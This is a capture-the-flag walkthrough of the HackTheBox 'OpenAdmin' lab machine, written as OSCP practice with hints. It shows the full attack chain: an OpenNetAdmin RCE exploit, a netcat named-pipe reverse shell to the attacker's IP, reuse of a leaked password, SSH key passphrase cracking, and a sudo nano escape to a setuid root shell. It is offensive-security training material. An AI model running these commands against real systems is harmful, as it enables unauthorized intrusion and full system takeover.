Follow along in my OSCP journey, this is my target 14 of the TJNULL’s OSCP list.
How to use this walkthrough?
To avoid the typical answer on a plate type of walkthrough, I have decided to follow the TryHackMe idea of giving you some hints along the way to help you when you struggle and keep the Try Harder mantra real.
Let’s go!
Enumeration
I use Tib3rius’ multi-threaded Autorecon which combines a couple of different tools to enumerate and scan services. It creates a simple file structure and provides you a nice overview of the services scanned.
python3 /opt/AutoRecon/autorecon.py -cs 25 -vv -o /home/kali/Documents/HTB/lab/ 10.10.10.171
Autorecon
While it runs, I usually look at the _quick_tcp_nmap.txt file while we wait for the _full_tcp_nmap.txt
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCcVHOWV8MC41kgTdwiBIBmUrM8vGHUM2Q7+a0LCl9jfH3bIpmuWnzwev97wpc8pRHPuKfKm0c3iHGII+cKSsVgzVtJfQdQ0j/GyDcBQ9s1VGHiYIjbpX30eM2P2N5g2hy9ZWsF36WMoo5Fr+mPNycf6Mf0QOODMVqbmE3VVZE1VlX3pNW4ZkMIpDSUR89JhH+PHz/miZ1OhBdSoNWYJIuWyn8DWLCGBQ7THxxYOfN1bwhfYRCRTv46tiayuF2NNKWaDqDq/DXZxSYjwpSVelFV+vybL6nU0f28PzpQsmvPab4PtMUb0epaj4ZFcB1VVITVCdBsiu4SpZDdElxkuQJz
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHqbD5jGewKxd8heN452cfS5LS/VdUroTScThdV8IiZdTxgSaXN1Qga4audhlYIGSyDdTEL8x2tPAFPpvipRrLE=
| 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBcV0sVI0yWfjKsl7++B9FGfOVeWAIWZ4YGEMROPxxk4
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.16 (93%),
Web
We start with the web server
Let’s look for hidden directories
gobuster dir -u http://10.10.10.171 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
HINT
It looks like all these 3 endpoints are just templates but one has a clear interesting thing to it…
.
.
.
.
We can see the login feature from /music which send us to /ona
If we check the menu for the about section
We find the software we’re looking for
Let’s see it it’s vulnerable
I checked these exploits but checked for any github PoCs that would save me some time
We read the doc, check if the version we have is actually vulnerable and then run the exploit
python3 ona-rce.py check http://openadmin.htb/ona/
python3 ona-rce.py exploit http://openadmin.htb/ona/
Jackpot, let’s get a reverse shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.22 4444 >/tmp/f
Time for some shell upgrade 😉
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
HINT
Obviously we’re trying to priv esc, but we’re the www-data user, let’s do some digging and see if we can find something, config files are usually quite juicy
.
.
.
.
If you dig enough
We also need to find what users we can try this against, we got jimmy and joanna.
cat /etc/passwd
We know the server runs ssh, let’s try that and it works with jimmy!
jimmy:n1nj4W4rri0R!
ssh jimmy@10.10.10.171
We are in but it seems we’re still not user based on not finding the flag
Let’s run some scripts to get a better idea of what’s going on on this machine
Enumeration scripts
This is where we upload our linpeas, LinEnum and Exploit Suggester.
On our attacking machine
We start by setting our Simple Python HTTP Server
sudo python -m SimpleHTTPServer 80
On the victim’s machine
We look for a writable folder, wget the scripts we want, give them the right permissions and finally execute them.
cd /tmp/
wget http://10.10.14.22/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
it seems like both users are part of internal, we still don’t know what the internal group is for …
We might have found what it relates to, there is an internal web app based on the apache config file
Nice we find where it’s running
Let’s look at the app folder /var/www/internal
What is this app
cat *.php
We have 2 interesting things:
it seems we have a hash for some password to have a session as jimmy not sure if that will get us anything
But then we have this which seems like it would reveal joanna’s private SSH key
The only issue is that we can’t run this ourselves …
HINT
How could we grab this with the server running it …
.
.
.
.
As we saw in the config file, the app is running locally on port 52846, let’s curl it and see
Hell yeah, let’s connect as joanna
vi priv_key_joanna
chmod 400 priv_key_joanna
ssh joanna@10.10.10.171 -i priv_key_joanna
There is a passphrase, let’s crack it
ssh2john priv_key_joanna > priv_key_joanna.hash
sudo john --wordlist=/usr/share/wordlists/rockyou.txt priv_key_joanna.hash
Let’s try again, let’s go!
Grab the user flag.
Getting Root
The way I go about getting root is the following: I’ll look for some quick wins and then run some enumeration scripts to help me find some weaknesses.
Quick Wins
sudo -l → sudo permissions
ls -la /opt/ → looking for interesting executables or files
ls -la /var/www/; ls -la /var/www/html → possible configuration files with db pasword or even user password.
ls -la /etc/passwd; ls -la /etc/shadow → misconfigured permissions (write on passwd and read on shadow)
The classic sudoers permissions does the trick
Let’s check GTFOBins
sudo /bin/nano /opt/priv
^R^X
reset; sh 1>&0 2>&0
For ^R and ^X it’s actually Ctrl + R then Ctrl + X
Let’s actually get a proper root shell
cp /bin/bash /tmp && chmod +s /tmp/bash #inside the nano window
exit
/tmp/bash -p # -p allows to run the scrip with the owner's privilege
What did I learn?
I don’t feel like we’ve learned a lot from this one, I feel like it was good practice but there wasn’t anything new that we hadn’t seen before.
Stream
I hope you guys enjoyed the walkthrough. Don’t hesitate to join me and struggle together on those machines on my twitch stream Wednesdays and Sundays.